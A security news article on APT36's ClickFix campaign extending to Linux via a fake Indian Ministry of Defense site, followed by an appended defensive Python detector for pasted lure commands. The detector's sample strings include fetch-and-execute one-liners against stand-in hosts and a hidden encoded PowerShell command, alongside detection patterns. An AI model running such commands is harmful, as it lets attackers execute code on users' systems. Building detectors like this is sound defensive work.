Hackers Test ClickFix Attacks against Targets on Linux and macOS

Written by Levi Yoris | May 12, 2025 11:44:33 PM

A new malicious campaign has highlighted how ClickFix attacks are rapidly evolving and expanding their reach. Originally targeting Windows systems through PowerShell scripts that enabled spyware and ransomware infections, this technique has now begun to also target Linux and macOS users. In these attacks, cybercriminals use fake error messages (such as alleged Google Meet failures) or simulated verification screens to trick victims into executing commands in the terminal.

ClickFix does not rely on technical system vulnerabilities, but rather on something much more human: trust. Through social engineering tactics, attackers manipulate users into running scripts that appear legitimate but conceal malware designed to compromise the system. Even environments considered more secure, like Linux, are not exempt.

ClickFix Now Also Targets Linux Users

Recently, researchers at Hunt.io detected a new campaign that marks an interesting shift: for the first time, ClickFix attacks are being adapted for Linux systems. This campaign, attributed to the threat group APT36 (also known as Transparent Tribe and linked to Pakistan), uses a fake website impersonating the Indian Ministry of Defense. The site includes a link to what appears to be an official press release but is in fact a trap designed to deceive users into executing malicious commands on their machines.

(Image: Malicious website imitating the Indian Ministry of Defense)

When someone clicks the link to the fake site, it detects which operating system the visitor is using and steers them down the attack path built for that system.

If you're on Windows, a full-screen page appears with a warning about limited usage rights, which looks unremarkable at first glance. But if you click "Continue," a JavaScript snippet runs that silently copies a malicious command to the clipboard. The unsuspecting victim only needs to paste it into the terminal and run it. With that, a .NET loader is launched, which connects directly to the attacker's servers. All of this happens while an official-looking PDF file is displayed to avoid raising suspicion.

On Linux, the tactic is slightly different but just as deceptive. The user is redirected to a page with a fake CAPTCHA. When they click the "I'm not a robot" button, a shell command is copied to the clipboard. The site then instructs them to press ALT+F2, which opens the run-command dialog in most Linux desktop environments, paste the command there, and press Enter. And just like that, the malware is in.

Test or Real Threat? This Is How APT36's Experiment on Linux Works

The command executed on Linux downloads a file named mapeal.sh onto the victim’s device. However, according to researchers, the current version of this script does not perform any malicious actions yet. For now, it simply downloads a JPEG image from the attacker's server.

“The script downloads a JPEG image from the same directory on trade4wealth[.]in and opens it in the background,” Hunt.io explains. “We did not observe any other activity—no persistence, no lateral movement, no outbound connections.”

This doesn’t mean everything is under control. It’s highly likely that APT36 is testing how effective its attack chain is on Linux, and that this is just a trial version. At any moment, that image could be replaced with an actual script designed to install malware, spy on the user, or cause more serious damage.

What’s concerning is that this ClickFix variant has already been adapted for Windows, macOS, and now Linux—demonstrating how versatile and dangerous it can be.

As a general rule, never copy and paste commands into the Run dialog (or the terminal) unless you are absolutely sure what they do. That simple action could be enough to compromise your system and expose your personal or professional data.
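The "paste this into the terminal or Run dialog" step is the one place a defender can interpose a check. As an added example, not code from the article or from Hunt.io, here is a small Python heuristic that can be run over pasted text, a clipboard log, or shell history to flag commands with the ClickFix shape (remote fetch plus immediate execution, concealment, or an encoded payload). The regexes, the hostnames and all sample commands are constructed for illustration, not indicators from the campaign.

```python
import re

# Heuristics for the "paste this command" step of a ClickFix lure. The
# patterns and the sample commands below are constructed for this example;
# they are not Hunt.io's indicators from the campaign described above.
HEURISTICS = {
    # fetches something from a remote host
    "remote_fetch": re.compile(
        r"\b(curl|wget|Invoke-WebRequest|iwr|irm|Invoke-RestMethod)\b", re.I),
    # pipes whatever was fetched straight into an interpreter
    "pipe_to_interpreter": re.compile(
        r"\|\s*(sudo\s+)?(ba|z|da)?sh\b|\|\s*iex\b|Invoke-Expression", re.I),
    # carries its real payload base64-encoded so the user cannot read it
    "encoded_payload": re.compile(
        r"base64\s+(-d|--decode)\b|-e(c|nc|ncodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    # hides the window or backgrounds the process, as mapeal.sh does with its image
    "hidden_or_background": re.compile(
        r"-w(indowstyle)?\s+hidden\b|\bnohup\b|\bsetsid\b|>\s*/dev/null|&\s*$", re.I),
}

def clickfix_indicators(cmd: str) -> list[str]:
    """Names of the heuristics a candidate command trips, in dictionary order."""
    return [name for name, rx in HEURISTICS.items() if rx.search(cmd)]

def should_block(cmd: str) -> bool:
    """A lone download (curl -O of a tarball) is routine; an encoded command, or a
    download combined with immediate execution or concealment, is the ClickFix
    shape and should be refused or sent for review."""
    hits = set(clickfix_indicators(cmd))
    if "encoded_payload" in hits:
        return True
    return "remote_fetch" in hits and bool(
        hits & {"pipe_to_interpreter", "hidden_or_background"})

def flag_history(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Scan shell-history or clipboard-log lines and return the ones to review."""
    return [(l, clickfix_indicators(l)) for l in lines if should_block(l)]

if __name__ == "__main__":
    # Constructed samples: two routine commands and three lure-style ones.
    samples = [
        "ls -la ~/Downloads",
        "curl -O https://example.invalid/tools.tar.gz",
        "curl -s https://lure.example.invalid/mapeal.sh | sh",
        "wget -q https://lure.example.invalid/x.sh -O /tmp/x.sh; sh /tmp/x.sh >/dev/null 2>&1 &",
        "powershell -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFB",
    ]
    for line, why in flag_history(samples):
        print(f"BLOCK {why}: {line}")
```

A plain download with no execution or concealment is deliberately left alone, so the check stays quiet for ordinary use of curl and wget.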